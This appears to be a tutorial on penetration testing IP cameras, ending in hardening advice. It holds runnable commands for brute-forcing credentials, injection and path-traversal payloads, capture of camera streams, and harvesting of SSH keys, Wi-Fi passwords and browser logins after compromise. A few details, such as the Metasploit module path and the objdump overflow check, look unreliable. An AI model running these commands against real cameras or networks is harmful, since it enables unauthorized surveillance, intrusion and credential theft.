IP Camera Penetration Testing Guide

Introduction

IP cameras have become ubiquitous in modern security infrastructure, yet they remain one of the most frequently compromised IoT devices. Their accessibility, combined with poor security practices during deployment, makes them prime targets for attackers. This guide walks you through the complete process of conducting professional penetration tests on IP camera systems, from initial reconnaissance to exploitation and remediation.

Common IP Camera Vulnerabilities

Understanding the vulnerability landscape is crucial for effective testing. Here are the most prevalent security issues found in IP cameras:

1. Default Credentials

Default credentials remain unchanged in many deployments because administrators either forget to change them or are unaware they exist. Manufacturers ship devices with standard username/password combinations (e.g., admin/admin, admin/12345). Attackers compile extensive lists of these defaults and use automated tools to attack cameras at scale. A single camera with default credentials can become an entry point to the entire network.

2. Firmware Vulnerabilities

Firmware vulnerabilities persist when updates remain unapplied. Manufacturers release patches to address security flaws, but many organizations never update camera firmware after installation. Legacy firmware may contain:

• Remote code execution (RCE) vulnerabilities
• Authentication bypass flaws
• Buffer overflow vulnerabilities
• Command injection weaknesses

3. Weak or Unencrypted Transmission

Data in transit between cameras and recorders is often unencrypted. Unencrypted RTSP (Real Time Streaming Protocol) streams allow traffic interception without authentication. An attacker on the same network segment can:

• View camera feeds directly
• Capture video streams
• Modify stream data in transit
• Perform man-in-the-middle (MITM) attacks

4. Insecure Web Interfaces

The web interfaces used for camera management contain multiple classes of vulnerabilities:

• Cross-Site Scripting (XSS): Allows injection of malicious scripts
• SQL Injection: Permits unauthorized database access
• Command Injection: Enables arbitrary system command execution
• Path Traversal: Allows access to restricted files
• Poor Session Management: Enables session hijacking and credential theft

5. Hardcoded Backdoor Accounts

Some camera manufacturers include hardcoded backdoor accounts for support and diagnostics. These accounts cannot be removed through normal configuration and provide permanent access to the device. Common backdoor patterns include:

• Service accounts with known passwords
• Debug/maintenance accounts
• OEM-specific credentials

6. Lack of Network Segmentation

Cameras are often placed on the main corporate network without VLAN isolation or firewall rules, allowing lateral movement from a compromised camera to sensitive systems.

Essential Commands & Tools Reference

Phase 1: Reconnaissance & Discovery

Network Scanning

IP cameras typically listen on these ports:

• 80/443: HTTP/HTTPS web interfaces
• 554: RTSP (Real Time Streaming Protocol)
• 8000/8080: Alternative HTTP ports
• 5554/8554: Alternative RTSP ports
• 9000: Some Axis cameras

Basic network scan:

# Quick scan for common camera ports
nmap -sS -p 80,443,554,8000,8080,5554,8554 192.168.1.0/24

# Aggressive scan with version detection
nmap -sV -O -p 80,443,554,8000,8080,5554,8554 192.168.1.0/24

# Full port scan on identified device
nmap -sC -A -p- 192.168.1.100

# Focus on service version detection
nmap -sV --script http-headers,rtsp-url-brute 192.168.1.100

RTSP Stream Discovery

Many cameras expose RTSP streams without any authentication:

# Automated discovery with Cameradar
docker run -t ullaakut/cameradar -t 192.168.100.0/24

# Manual RTSP path enumeration
nmap --script rtsp-url-brute -p 554 192.168.1.100

# Test RTSP stream access
ffprobe rtsp://192.168.1.100:554/stream
ffplay rtsp://192.168.1.100:554/stream
vlc rtsp://192.168.1.100:554/stream1

# Identify common stream paths
for path in stream stream1 stream2 main video live; do
  echo "Testing: rtsp://192.168.1.100:554/$path"
  timeout 2 ffprobe rtsp://192.168.1.100:554/$path 2>&1 | head -3
done

Web Interface Enumeration

# Download HTML for source code analysis
curl http://192.168.1.100 -o camera_page.html

# Check HTTP headers for version info
curl -I http://192.168.1.100

# Extract embedded JavaScript files
curl http://192.168.1.100 | grep -oP 'src="[^"]*\.js"'

# Directory enumeration with common wordlist
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.1.100/FUZZ

# Extended directory enumeration
dirb http://192.168.1.100 /usr/share/wordlists/dirb/big.txt

# Check for backup/config files
for file in backup.zip config.xml settings.conf admin.zip; do
  curl -s -o /dev/null -w "%{http_code}" http://192.168.1.100/$file && echo " - $file found"
done

Phase 2: Vulnerability Assessment & Exploitation

Testing Default Credentials

Default credentials are almost always the first successful attack vector:

# HTTP Basic Authentication brute force
hydra -l admin -P camera_passwords.txt 192.168.1.100 http-get /

# HTTP POST login form
hydra -l admin -P camera_passwords.txt 192.168.1.100 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# RTSP authentication
hydra -l admin -P camera_passwords.txt 192.168.1.100 rtsp

# SSH brute force (some cameras expose SSH)
hydra -l root -P camera_passwords.txt 192.168.1.100 ssh

# Telnet access (legacy devices)
hydra -l admin -P camera_passwords.txt 192.168.1.100 telnet

# FTP access (rarely exposed)
hydra -l admin -P camera_passwords.txt 192.168.1.100 ftp

Common camera default credentials:

admin:admin
admin:12345
admin:123456
admin:(empty)
root:pass
root:root
root:12345
service:service

Web Application Vulnerability Testing

# Test for XSS vulnerabilities
curl "http://192.168.1.100/search?q=<script>alert(1)</script>"
curl "http://192.168.1.100/login?username=<img src=x onerror=alert(1)>"

# Test for SQL Injection
curl "http://192.168.1.100/login?username=admin' OR '1'='1&password=x"
curl "http://192.168.1.100/user?id=1' UNION SELECT NULL,username,password FROM users--"

# Test for command injection
curl "http://192.168.1.100/upload?cmd=;whoami;"
curl "http://192.168.1.100/search?query=test`id`"

# Test for path traversal
curl "http://192.168.1.100/../../../../etc/passwd"
curl "http://192.168.1.100/config/../../etc/shadow"

RTSP Stream Capture & Analysis

# Attempt unauthenticated stream access
ffplay rtsp://192.168.1.100:554/stream

# Access stream with credentials
ffplay rtsp://admin:12345@192.168.1.100:554/stream

# Record stream to file (60 seconds)
ffmpeg -rtsp_transport tcp -i rtsp://192.168.1.100:554/stream -c copy -t 60 output.mp4

# Record with transcoding
ffmpeg -rtsp_transport tcp -i rtsp://admin:12345@192.168.1.100:554/stream \
  -c:v libx264 -preset fast -b:v 1000k \
  -c:a aac -b:a 128k \
  -t 300 recorded_video.mp4

# Stream to HTTP server
ffmpeg -rtsp_transport tcp -i rtsp://admin:12345@192.168.1.100:554/stream \
  -c:v copy -c:a copy -f rtp_mpegts udp://224.1.1.1:1234

Firmware Extraction & Analysis

# Download firmware from web interface
wget http://192.168.1.100/firmware.bin
wget http://192.168.1.100/download?file=firmware

# Extract firmware via SSH if available
scp root@192.168.1.100:/root/firmware.bin .

# Identify firmware type
file firmware.bin
binwalk firmware.bin

# Extract firmware contents
binwalk -e firmware.bin
cd _firmware.bin.extracted

# Search for hardcoded credentials
strings -a squashfs-root/etc/passwd | head -20
grep -r "password\|admin\|root" squashfs-root/etc/ | head -20

# Find configuration files
find squashfs-root -name "*.conf" -o -name "*.cfg" -o -name "*.config"

# Extract strings from binaries
strings squashfs-root/bin/httpd | grep -iE "password|auth|login"

# Search for private keys
find squashfs-root -name "*.key" -o -name "*.pem" -o -name "*.der"

Advanced Binary Analysis

# Install analysis tools
sudo apt-get install binwalk ghidra radare2 cutter

# Extract and analyze web server binary
binwalk -e firmware.bin
radare2 -A _firmware.bin.extracted/squashfs-root/bin/httpd

# Ghidra analysis (GUI)
ghidra _firmware.bin.extracted/squashfs-root/bin/httpd

# Search for vulnerable functions
strings _firmware.bin.extracted/squashfs-root/bin/httpd | grep -E "strcpy|sprintf|gets|strcat"

# Check for buffer overflow opportunities
objdump -d _firmware.bin.extracted/squashfs-root/bin/httpd | grep -A 3 "mov.*rbp"

Camera-Specific Exploitation Tools

# Cameradar - Comprehensive camera reconnaissance
docker run -it -v /tmp/cameradar:/output ullaakut/cameradar:latest \
  -t 192.168.100.0/24 -o /output

# Shodan search for exposed cameras (web interface)
# Visit https://www.shodan.io
# Search queries: "default-auth" port:80
#                 "realm" port:554
#                 "ip_address" hikvision
#                 "ip_address" dahua

# Metasploit camera modules
msfconsole
> search type:exploit platform:linux hikvision
> use exploit/linux/rtsp/hikvision_backdoor_cve
> set RHOST 192.168.1.100
> exploit

Configuration Extraction

# Try to download configuration files
for config in config.bin settings.xml admin.xml user.xml network.conf; do
  curl -o $config http://192.168.1.100/$config 2>/dev/null && echo "Found: $config"
done

# Download from common admin paths
curl -o admin_config.xml http://192.168.1.100/admin/config.xml
curl -o backup.zip http://192.168.1.100/backup.zip

# Extract and analyze
file admin_config.xml
strings admin_config.xml | grep -iE "password|user|key|credential"

# Check for SQL databases
find squashfs-root -name "*.db" -o -name "*.sqlite"

Phase 3: Traffic Analysis

Network traffic analysis can reveal unauthenticated streams, credentials, and protocol weaknesses:

# Capture all traffic from camera
tcpdump -i eth0 host 192.168.1.100 -w full_capture.pcap

# Capture only RTSP traffic
tcpdump -i eth0 port 554 -w rtsp_traffic.pcap

# Look for plaintext credentials in HTTP
tcpdump -i eth0 -A "port 80 and host 192.168.1.100" | grep -iE "password|user|auth|login"

# Monitor DNS queries
tcpdump -i eth0 -nn "host 192.168.1.100 and port 53" -w dns.pcap

# Extract HTTP POST data
tcpdump -i eth0 -A "host 192.168.1.100 and tcp port 80" | grep -A 10 "POST"

# Analyze with Wireshark
wireshark -i eth0 -f "host 192.168.1.100"

# Extract credentials from RTSP
tshark -r rtsp_traffic.pcap -Y "rtsp" -T fields -e rtsp.auth

Related Reading - Wireshark RTP Extraction Guide

Related Reading: For an in-depth guide on extracting and analyzing RTP streams from captured network traffic, check out my Wireshark RTP Extraction Guide. This guide covers advanced techniques for extracting video payloads from RTSP and RTP traffic, which is particularly useful when dealing with H.264 and H.265 encoded streams from IP cameras.

Phase 4: Post-Exploitation & Lateral Movement

Reconnaissance from Compromised Camera

# Scan internal network ranges
nmap -sL 192.168.0.0/16
nmap -sP 192.168.0.0/24

# Identify open services
for i in {1..254}; do
  timeout 1 bash -c "</dev/tcp/192.168.1.$i/22" 2>/dev/null && echo "192.168.1.$i:22 open"
done

# Check routing configuration
route -n
ip route
cat /etc/resolv.conf

# List network interfaces
ifconfig
ip addr show

# Find network neighbors
arp -a
ip neighbor

Credential Harvesting

# Extract stored SSH keys
cat ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa

# Find stored credentials
grep -r "password" /etc/
grep -r "api_key\|token\|secret" /var/www/html/

# Check saved wireless passwords
cat /etc/wpa_supplicant/wpa_supplicant.conf

# Extract from browser storage
cat ~/.mozilla/firefox/*/logins.json

# Find config files with credentials
find / -name "*.conf" -o -name "*.cfg" | xargs grep -l "password"

Firmware Vulnerabilities - Detailed Analysis

CVE Research & Exploit Development

# Download vulnerability databases
searchsploit hikvision
searchsploit dahua
searchsploit axis

# Check NIST NVD
# https://nvd.nist.gov/vuln/search
# Search for: "Hikvision" AND version

# Find public exploits on GitHub
# https://github.com/search?q=hikvision+exploit+language:python

Remediation & Hardening Best Practices

For System Administrators

1. Change all default credentials immediately

   • Use strong, unique passwords (20+ characters)
   • Implement password policy enforcement
   • Store credentials securely (password manager)

2. Enable HTTPS/TLS encryption

   • Disable HTTP completely
   • Install valid SSL certificates
   • Enforce HTTPS-only with HSTS headers

3. Apply firmware updates regularly

   • Subscribe to manufacturer security bulletins
   • Test updates in isolated environment first
   • Establish monthly patch schedule

4. Implement network segmentation

   • Place cameras on dedicated VLAN (VLAN 50+)
   • Use separate IP subnet (10.50.0.0/24)

5. Deploy firewall rules

   # Allow only authorized IPs to camera management
   allow 10.10.10.0/24 to 10.50.0.0/24 port 443
   allow 10.10.10.5 to 10.50.0.0/24 port 554
   deny all else
   

6. Disable unnecessary services

   • Telnet (use SSH only)
   • HTTP (use HTTPS only)
   • FTP (use SFTP)
   • UPnP/SSDP (Universal Plug and Play)
   • ISCSI (Internet Small Computer Systems Interface)

7. Enable audit logging

   • Log all failed login attempts
   • Log configuration changes
   • Log video access requests
   • Retain logs for 90+ days

8. Regular security assessments

   • Penetration tests
   • Vulnerability scanning
   • Configuration reviews

Default Passwords Reference

A comprehensive list of default credentials by manufacturer:

Tools & Resources

Essential Tools

• Nmap: Network discovery and port scanning
• Hydra: Credential brute forcing
• Wireshark: Network traffic analysis
• Cameradar: Automated camera discovery
• FFmpeg/FFprobe: Video stream manipulation
• Burp Suite: Web application testing
• Metasploit Framework: Exploit development

Vulnerability Databases

• NIST NVD - Official vulnerability database
• Exploit-DB - Exploit repository
• Shodan - Internet device search
• GitHub Exploits - Public PoCs

References & Further Reading

• iSpy Camera Default Passwords
• RTSP Protocol RFC 7826
• David Bombal - Hacking IP Cameras

Conclusion

IP camera penetration testing requires a systematic, methodical approach combining network reconnaissance, vulnerability assessment, and exploitation techniques. The vulnerabilities discussed in this guide are common but entirely preventable with proper security practices.

Remember: The vast majority of camera compromises result from just two issues:

1. Unchanged default credentials - Change them immediately
2. Unpatched firmware - Establish a regular update schedule

By implementing these two controls alone, you eliminate 80% of attacks. Combined with network segmentation, strong encryption, and regular security audits, you create a robust defense against IP camera exploitation.

Always conduct testing within proper authorization and document all findings for remediation tracking.